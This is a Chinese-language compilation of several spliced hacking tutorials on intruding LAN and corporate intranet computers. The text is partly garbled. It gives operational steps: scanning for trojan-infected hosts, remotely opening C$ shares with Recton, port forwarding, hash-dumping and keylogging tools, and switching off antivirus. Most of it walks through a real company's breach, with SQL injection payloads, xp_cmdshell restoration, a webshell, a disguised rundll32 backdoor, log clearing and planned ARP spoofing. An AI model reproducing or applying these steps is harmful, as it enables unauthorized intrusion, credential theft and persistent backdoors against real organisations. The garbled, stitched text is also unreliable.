入侵内网一般过程
如何成功入侵局域网电脑

如何成功入侵局域网电脑我们在入侵的时候难免遇到忘记一些小步骤和小命令的时候。
下面是店铺跟大家分享的是如何成功入侵局域网电脑,欢迎大家来阅读学习。
如何成功入侵局域网电脑入侵局域网电脑方法一1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。
2.判断对方上网的地点,开个DOS窗口键入TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。
3.得到对方电脑的名称,开个DOS窗口键入NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可迚入。
入侵局域网电脑方法二1、下载必备的工具软件。
1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。
下载完毕并解压缩之后跟我迚行第二步!2、运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就迚入了网络刺客II的主界面。
第三步在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就迚入了“搜索因特网主机”界面。
第四步迚入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。
“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。
怎样入侵局域网

分析内部网络的漏洞后,就利用“端口重定向”来பைடு நூலகம்侵。
所谓端口转向功能,就是将对某个端口的请求转向到其他电脑上,假设某一分机的内部IP是192.168.0.2,经过流光的扫描知道Administrator的口令为123,并且开放Telnet和3389服务,主机的外部IP是202.99.1.1。在202.99.1.1上运行了一个端口转向的程序(Fpipe.exe),经过参数设置,这个程序先在202.99.1.1开,23端口并监听,当有请求连接时,创建一个socket,通过22端口把请求发送到192.168.0.2的23端口去.所以,当有人向主机202.99.1.1的23端口发送Telnet连接的请求时,端口转向程序就发生作用了,马上将这个请求转向到那台192.168.0.2分机上的23端口去,因为192.168.0.2开放Telnet服务,所以这台分机会马上作出回应,这样连接就会产生了,也就是说攻击者已经入侵到内网的分机。
例如,有这样一个局域网服务器的IP为202.99.1.1,其内部有一些分机,内部分机的IP我们暂不知道(不过通常为192.168.0.x)。
首先,假如我们已经取得202.99.1.1的Administrator的密码,通过IPCS打开Telnet服务并Telnet上202.99.1.1。执行ipconfig命令,得出其两块网卡的IP分别为192.168,0.1和202.99.1.1,那么其他的机器的IP应该就在192.168.0.X这个网段。在202.99.1.1上安装流光4.7的sensor(其实x-scan也可以,而且x-scan能够扫描的漏洞比流光多。不过操作起来就有点麻烦,你要先上传X-scan到主机,再telnet上去利用x-scan的命令行模式扫描,所以这个telnet终端不能断开,也就是说你要等到x—scan扫描完了才能断开telnet,否则就会中断扫描),主要是寻找内部网的漏洞。根据我的经验,内部网的机器的安全性极差!administrator的密码很弱智,多数为空或123、123456等!而且有许多分机的guest账号都是Administrators组的成员,总之就是漏洞重重!
图解网络入侵的过程

图解网络入侵的过程图解网络入侵的过程引言经济社会的发展要求各用户之间的通信和资源共享,需要将一批计算机连成网络,这样就隐含着很大的风险,包含了极大的脆弱性和复杂性,特别是对当今最大的网络——国际互联网,很容易遭到别有用心者的恶意攻击和破坏。
随着国民经济的信息化程度的提高,有关的大量情报和商务信息都高度集中地存放在计算机中,随着网络应用范围的扩大,信息的泄露问题也变得日益严重,因此,计算机网络的安全性问题就越来越重要。
本文主要是写了网络上几种入侵的过程一、简单的"黑客"入侵TCP/IP协议顺序号预测攻击是最简单的"黑客"入侵,也是系统安全的最大威胁。
在网络上,每台计算机有惟一的IP地址,计算机把目标IP地址和一个惟一的顺序号加载于传输的每一个数据包上。
在一个TCP连接中,接收机只收到具有正确IP地址和顺序号的那个包裹。
许多安全设备,如路由器,只允许有一定IP地址的计算机收发传送。
TCP/IP 顺序号预测入侵将使用网络给计算机赋址的方式和包裹交换的顺序来企图访问网络。
一般来说,"黑客"进行TCP/IP 顺序号预测攻击分两步:第一,得到服务器的IP地址。
黑客一般通过网上报文嗅探,顺序测试号码,由WEB浏览器连接到结点上并在状态栏中寻找结点的IP地址。
因为黑客知道其他计算机有一个与服务器IP地址部分公用的IP地址,他便尽力模拟一个能让其通过路由器和作为网络用户访问系统的IP号码。
例如,如果系统的IP 地址为192.0.0.15,黑客便知有近256台计算机可以连入一个C级网,并猜出所有最后位在序列中出现过的地址号码。
IP 地址指示了一个网络连接的计算机数,同时上述地址的高字节中两个最重要的位设定指出了该网为C级网,下图显示了黑客是怎祥预测C级网的IP号码的。
"黑客"用服务器的IP地址来猜测其他网络地址第二,黑客在试过网上IP地址之后,便开始监视网下传送包的序列号,然后,黑客将试图推测服务器能产生的下一个序列号,再将自己有效地插入服务器和用户之间。
校园网入侵操作步骤

校园网入侵操作步骤校园网入侵操作步骤一、条件准备下载三个黑客软件:NTscan变态扫描器、Recton v2.5、DameWare迷你中文版4.5。
NTscan变态扫描器可以对指定IP地址段的所有主机进行扫描,扫描方式有IPC扫描、SMB扫描、WMI扫描三种,可以扫描打开某个指定端口的主机,通过扫描可以得到其中弱口令主机的管理员用户名和密码。
Recton v2.5是一个典型的黑客攻击软件,只要拥有某一个远程主机的管理员账号和密码,并且远程主机的135端口和WMI 服务(默认启动)都开启,就可以利用该软件完成远程开关telnet,远程运行CMD命令,远程重启和查杀进程,远程查看、启动和停止服务、查看和创建共享、种植木马、远程清除所有日志等操作。
DameWare迷你中文版4.5是一款远程控制软件,只要拥有一个远程主机的账号和密码,就可以对该主机实施远程监控,监视远程主机的所有操作甚至达到控制远程主机的目的。
另外选择两台操作系统为Windows XP Professional的主机,其中一台作为实施攻击的主机(以下称“主机A”),另一台作为被攻击的主机(以下称“主机B”),并将两台主机接入局域网中。
二、模拟攻击前的准备由于本次模拟攻击所用到的黑客软件均可被较新的杀毒软件和防火墙检测出并自动进行隔离或删除的处理,因此,在模拟攻击前要先将两台主机安装的杀毒软件和防火墙全部关闭。
然后打开“控制面板”中的“windows安全中心”,执行“windows防火墙”设置,将“windows防火墙”也关闭,如图所示。
由于在默认的情况下,两台主机的IPC$共享、默认共享、135端口和WMI服务均处于开启状态,因此对共享、端口和服务不做任何调整。
设置主机A的IP地址为“172.16.100.1”,主机B的IP地址为“172.16.100.2”(IP地址可以根据实际情况自行设定),两台主机的子网掩码均应为“255.255.0.0”。
内网渗透思路简单介绍

内⽹渗透思路简单介绍内⽹⼊侵是在攻击者获取⽬标webshell之后的⼀个后渗透的过程。
内⽹渗透流程 内⽹渗透⼤致可以分为两部分⼀部分是内⽹信息收集,另⼀部分为内⽹⼊侵⽅法。
⼀、内⽹信息收集 1、本机信息收集 本机⽤户列表 本机进程 服务列表 开放端⼝ 电脑补丁 共享权限 系统⽇志 历史记录 2、扩展信息收集 扩展信息是本机所在同意局域⽹中的其他主机信息,这其中涉及到了Active Directory(域所在的数据库)、域控信息以及Dsquery命令。
3、第三⽅信息收集 NETBIOS SMB 漏洞信息 端⼝信息⼆、内⽹渗透⽅法 内⽹渗透现在有⼀点神话的感觉,其实内⽹渗透的本质还是渗透,只不过设计了⼀些其他的技术。
以下介绍⼀些常⽤的内⽹渗透⽅法: 1、端⼝转发 因为⽬标处于内⽹,通常外⽹⽆法访问导致渗透存在⼀定难度,这时就需要⼀些端⼝转发⼯具和反弹代理等操作。
Windows⼯具: Lcx.exe端⼝转发⼯具 Htran.exe端⼝转发⼯具 ReDuh端⼝转发 Linux⼯具: rtcp.py Puttp+ssh Socks代理 还有强⼤的Msf 2、HASH值抓取⼯具 Pwdump7 Gsecdump WCE Getpass(基于mimikatz)⼯具逆向获取铭⽂密码 3、密码记录⼯具 WinlogonHack——劫取远程3389登录密码 NTPass——获取管理员⼝令 键盘记录专家 Linux下的openssh后门 Linux键盘记录sh2log 4、漏洞扫描 Nmap——可以对操作系统进⾏扫描,对⽹络系统安全进⾏评估 Metasploit——强⼤的内⽹渗透⼯具 HScan——扫描常见漏洞 5、第三⽅服务攻击 1433——SQL server服务攻击 3306——Mysql服务攻击 其他第三⽅服务漏洞 6、ARP和DNS欺骗 利⽤内⽹嗅探⼯具抓取⽹络信息继⽽发起攻击 CAIN——⽹络嗅探⼯具。
如何一步一步入侵某公司内网

如何一步一步入侵某公司内网日期:2003-11-12 ·来源:中国学生网作者:小七查看:[大字体中字体小字体]我是不常聊天的人,但也有时在线。
这也就是本次活动的开始了,我认识了阳光女孩,而q软件的功能,让我一下能看看她的IP地址:请朋友们看:既然知道了地址,我就试试连接了,如下:回车后:这说明什么,这是iternet中机器,没设防火墙,且开了139端口,下面我做什么!!让流光上来工作吧:点击后:还等什么,输入IP地址吧!!!我们看得到了什么:这儿打住一下,至于怎么得到dministraor,为了安全起见,我想网管们是应该知道的,就不用我说了,当然如没这方面的漏洞,这也没问题,因为它开了139,就是说,我们能得到用户名,好了,我设想得到了,事实也是有了,我们如何去控制这台机器呢!最好的当然是远程服务了(3389),不过它不开我该怎办呢?这个吗,我们就远程开启它好了!你一定要问:如何开!没问题,到了内网时我会讲的!别着急。
我现已开启了它的远程服务端口,我用WIN2K客户端连接它点连接后,出现下面的画面:大家看到了这里要什么?老套!当然是密码了,用刚才得到的输吧:啊!久违,WIN2000!这才是第一步,当初我不知道下面有这么多的事,我本想通知网管改密码了,但当我打开网络一下你也许会吓一下的:大家看到了什么,如此大的一个网络!而我们也惊吧,这样大的网络,会是这样的不经一扫吗!!!顺说一句,阳光女孩,你大概不知道你已用了二级代理proxy 吧!也许有朋友要问:快装个sensor 吧,好向内网扫啊!!不要急,我们还圼呢,接下我们继续:在做什么!我在远程机器上安装流光,源文件如何来啊??真真菜,在远程机器上上网,到本站FTP来下载啊!!对不对!为了加快速度,我还要一一个superscan,先找出机器分布,不过这一次并不辛运,流光不能启动,这是怎么回事!!可是最新的流光了!找找原因吧,啊,是诺顿把流光杀了,(管理员注意,norton这方面的功能还是不错的!!!只好让它受点委屈了,关了它,先从任务管理器中杀掉进程,再到服务中(如图):方法是右健属性,停止这个服务,完成后不要以为就大功告成了,还得重启一下机器,我当时做这一步时,阳光告诉我说:刚才他们的网出了点问题!!而这时网管们不知道在做什么!!他们在网上泡妞吧!!!这样我的流光就正常工作了!我们首先要知道网内地址,下面做什么,还是用流光扫吧!看看我们扫到了什么,这么多的漏洞!!真是不可思议!!!我们试着用WIN2K、或远程登录看看如何!!!远程计算机不可用!!!不会吧,难道在做梦,事实是如此,怎么办,我们先远程开启它的远程服务吧,(如何办!!!,跟我来吧)先开个TFTP,传个ss.txt进去,然后进入远程命令行,输入。
个人电脑主机入侵,网站入侵,网络攻击的步骤

第一步:隐藏自已的位置为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。
所谓“肉鸡”通常是指,HACK实现通过后门程序控制的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。
第二步:寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。
在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。
当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。
此时,攻击者们会使用一些扫描器工具,以试图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以及服务程序的版本等资料,为入侵作好充分的准备。
第三步:获取帐号和密码,登录主机攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。
这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。
当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。
第四步:获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。
他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。
此外,为了避免目标主机发现,清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。
第五步:窃取网络资源和特权攻击者找到攻击目标后,会继续下一步的攻击。
如:下载敏感信息;窃取帐号密码、个人资料等。
三、网络攻击的原理和手法1、从扫描开始扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。
常见的扫描工具有X-scan、superscan、流光、X-port等。
局域网入侵方法介绍

局域网入侵方法介绍局域网入侵教程对于有些人来说非常重要,很是想要了解一些入侵方法,但是要掌握这些其实还是存在着一些难题。
下面由小编给你做出详细的局域网入侵方法介绍!希望对你有帮助!局域网入侵方法介绍:局域网入侵方法一:不过比如说在学校的时候,可以进入到整个学校网。
一般如果可以入侵的时候,一般就是有弱口令存在,主要就是其中还包含了139端口,不过其中的防火墙这方面的机子没有开。
所以这个时候需要有入侵工具,对于局域网入侵教程来说,所谓的工具主要就是包含以下这些:首先学习好局域网入侵教程,就是包含了变态扫描器、还有迷你中文版等各种工具,而且在工具之中还包含了杀毒软件,具有了报毒的作用。
在入侵的过程中,需要有变态扫描器,就是在IP地址之中,把需要进行扫描的地址给填上。
然后就是扫描的时候是选择WMI的方式,这样就是按开始键等就可以了,有关局域网ip如何设置的问题。
然后就是面贺杀专用版的名字就是Recton--D,也就是可以将CMD命令选择,然后把"net share C$=C:\"输入其中,这样就是把其余主机之中共享C盘那里进行开启。
这样的局域网入侵教程能够带给人们一些效益。
最后可以将这个变成D、E或者是F等,这样可以把其他盘之中的共享也可以进行开启,在这个过程中其实具有着很高的隐蔽性,而且共享是包含了完全的特点,有关win7防火墙设置问题。
就是这样,便能够达到对方电脑的C盘之中,然后根据自己掌握的技术把CMD 选项成功执行命令。
也就是通过这个方法可以达到局域网入侵的目的,所以必需要掌握局域网入侵教程。
局域网入侵方法二:点我的电脑右键单机管理,然后点操作底下的=》连接到另外一个计算机。
输入对方ip或者你不知道对方ip 可以这样,点浏览高级里的立即查找,就可以显示本局域网工作组内的计算机了。
然后双击你要进入的电脑,呵呵一般局域网的计算机密码是一样的,所以不需要NTLM验证,不过那个验证比较老了,现在不知道还有没有人会用,进入后然后点服务和应用,找到telnet服务,然后开启对方telnet服务,如果没有进入这些界面或者服务出错是因为对方没有开rpc服务,当然还是选择放弃吧,如果按照刚才步骤成功,那恭喜你已经得到一个进入对方计算机的通道了。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
渗透国内某知名公司内部局域网经过来源:未知时间:2009-08-0613:25编辑:菇在江湖本文的目标是一国内知名公司的网络,本文图片、文字都经过处理,均为伪造,如有雷同,纯属巧合。
最近一个网友要我帮他拿他们公司内网一项重要的文件,公司网络信息朋友都mail给我了,这些信息主要是几张网络拓扑图以及在内网嗅探到的信息(包括朋友所在的子网的设备用户名及密码等信息……)。
参照以上信息总体整理了一下入侵的思路,如果在朋友机器安装木马,从内部连接我得到一个CMD Shell,须要精心伪装一些信息还有可能给朋友带来麻烦,所以选择在该网络的网站为突破口,而且管理员不会认为有“内鬼”的存在。
用代理上肉鸡,整体扫描了一下他的网站,只开了80端口,没扫描出来什么有用的信息,就算有也被外层设备把信息过滤掉了,网站很大整体是静态的网页,搜索一下,查看源文件->查找->.asp。
很快找到一个类似http://www.*****.com/news/show1.asp?NewsId=125272页面,在后面加上and1=1 、and1=2前者正常,后者反回如下错误。
Microsoft OLE DB Provider for ODBC Driver error'80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character sting”./news/show/show1.asp,行59是IIS+MSSQL+ASP的站,在来提交:http://www.*****.com/news/show1.asp?NewsId=125272and 1=(selectis_srvrolemember('sysadmin'))http://www.*****.com/news/show1.asp?NewsId=125272and 'sa'=(select system_user)结果全部正常,正常是说明是当前连接的账号是以最高权限的SA运行的,看一下经典的“sp_cmdshell”扩展存储是否存在,如果存在那就是初战告捷。
http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*)from master.dbo.sysobjects where xtype=‘x’and name = 'xp_cmdshell')失败,看看是否可以利用xplog70.dll恢复,在提交:http://www.*****.com/news/show1.asp?NewsId=125272;execmaster.dbo.sp_addextendedproc'xp_cmdshell',’xplog70.dll’在试一下xp_cmdshell是否恢复了,又失败了,看样管理是把xp_cmdshell和xplog70.dll 删除了,想利用xp_cmdshell“下载”我们的木马现在是不可能的。
首先我们先要得到一个WEB Shell,上传xplog70.dll,恢复xp_cmdshell在利用xp_cmdshell运行我们上传的木马,这都是大众入侵思路了,前辈们以经无数人用这个方法入侵成功。
拿出NBSI扫一下,一会后台用户名和密码是出来了,可是后台登录地址扫不出来,测试了N个工具、手工测试也没结果,有可能管理员把后台删除了。
我们想办法得到网站的目录,这时就须要用到xp_regread、sp_makewebtask两个扩展存储,试一下是否存在:http://www.*****.com/news/show1.asp?NewsId=125272and1=(select count(*)from master.dbo.sysobjects where name= 'xp_regread')http://www.*****.com/news/show1.asp?NewsId=125272and1=(select count(*)frommaster.dbo.sysobjects where xtype='X'and name ='sp_makewebtask')全部返回正常说明存在(一般的网管不太了解他们,存在也很正常),首先简单介绍一下xp_regread扩展存储过程及sp_makewebtask Web助手存储过程,xp_regread是用来读取注册表信息的,我们可以通过这个来得到保存在注册表中的Web绝对路径。
sp_makewebtask这个就是我们用来得到WEB Shell的,主要功能就是导出数据库中表的记录为文件。
这个方法网上很早就出现了,我们网站的目录在注册表里是在HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\,我们在数据库里建一个表,将他存储在表里,在使数据库错误回显在IE里。
http://www.*****.com/news/show1.asp?NewsId=125272;create table[dbo].[biao]([zhi][char](255));这时候我们就建了一个名为biao的表,并添加了一个类型为char长度是255的字段,名为zhi,然后添加数据:http://www.*****.com/news/show1.asp?NewsId=125272;declare@result varchar(255) execmaster.dbo.xpregread'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\ Parameters\Virtual Roots','/',@result output insert into biao(zhi)values(@result);--然后暴出WEB绝对路径:http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*)from biao where zhi>1)IE返回错误,得到网站的物理路径e:\inetput\web\,向网站目标写个小网页木马,一个朋友以前写过一个程序,由于只是内部用的,我就不抓图了,网上早就有发布过这种工具,有兴趣下载自己看看吧!原理都是一样的,如果想手工输入就是麻烦了点,但可以向网站脚本文件写入“一句话木马”在远程提交,以得到一个大马的目的。
登录木马后把自己机器的xplog70.dll上传到网站目录在传一个hacker's door,黑客之门只有一个dll,我们要建一个批处理,名子为run.bat:@echo off@rundll32kernel,DllRegisterServer svchost.exe@del run.bat在拿一下文件合并器,将我们建的批处理和dll文件合并成一个exe文件,黑客之门的使用方法我就不多说了,他有详细的使用手册,建议在处理一下,以免传到服务器上被查杀。
黑客之门主要用处是可以利用服务器上所开的任何端口和我通信,现在恢复他的xp_cmdshell 扩展存储:http://www.*****.com/news/show1.asp?NewsId=125272;execmaster.dbo.sp_addextendedproc'xp_cmdshell',’e:\inetput\web\xplog70.dll’;--在IE里提交:exec master.dbo.xp_cmdshell’ e:\inetput\web\rootkit.exe’ rootkit.exe是黑客之门改的名子,注意这个程序要解绑到系统目录如图1。
木马运行后,Nc–vv ip 80 输入密码就得到一个CMD Shell,在放一个隐藏的asp木马,简单的把入侵的痕迹清理一下。
以上的方法很早就有了,由于网上资料也很多、本文主要说渗透内网,篇幅有限我就不过多解释了。
渗透内网这个网络很大共有七个网管,现在当前位置是F网、朋友在B网、目标在A网。
朋友给的资料,目前接入internet的两台设备未知(假设未知的设备都是路由器),图2是该公司大体的网络拓扑图。
掌握B网所有设备用户名密码(朋友之前嗅探到的)。
除A网其它网络可以自由通信,A网内有公司重要信息所以不像其它网,它是不允许任何人访问的,路由不给予转发数据,也就是只进不出的网络,虽然现在的网络是外紧内松,但是想进入目标主机还是有些难度。
怎么跨过设备的限制到达目标呢!您还要向下看。
现在首要的目的就是让router3给我们转发数据包。
首先尝试telnet登录路由,拒绝访问不能登录,我想也不能登录,应该是访问控制列表限制了。
现在我们首要目标拿下router3的控制权,为什么目标定位在router3呢!我们现在知道他的登录密码;我当前位置可以和B网直接通信;Router3是A、B网络公用的,应该两个网管都有权限登录;这一点也是最重要的,只有router3给予数据转发才可以和目标主机通信;个人认为router3是最佳路线,现在假设一下,如果B网管理员所管理的设备只有他本身所用的IP或TFTP Server(兼DHCP Server)才可以登录设置,那么有如下思路可以完成入侵。
一般来说管理员主机一定可以登录这台路由器的,网管主机都不可以登录设备那么谁为维护网络呢!1、直接得到B网管理员主机的一个CMD Shell来登录设备。
2、得到管理员同网段一台主机的CMD Shell,从而利用ARP欺骗来telnet目标路由。
3、得到B网其它网段中可访问外部网络一台主机的CDM Shell,伪装CDM Shell主机IP地址,必要情况伪装IP+MAC地址来欺骗路由器,(机会高达到50%)。
经过分析拿B网的DHCP服务器(172.16.101.25)开始,选择突破点也是很重要的,DHCP服务器为了提供这个网段的服务他是暴露在相对外部的,而且不在VLAN的管辖中,还和网管在同一交换机下,而且听朋友说他们公司PC几乎不打补丁,还有很多员工不知补丁为何物,这也给入侵带来及大的方便。
利用服务器的WEB木马上传一些流行的溢出程序,直接拿个溢出程序溢出他的DHCP服务器,(最后才知道2003年的溢出程序对这个主机都有用)成功得到一个System权限的CMD Shell。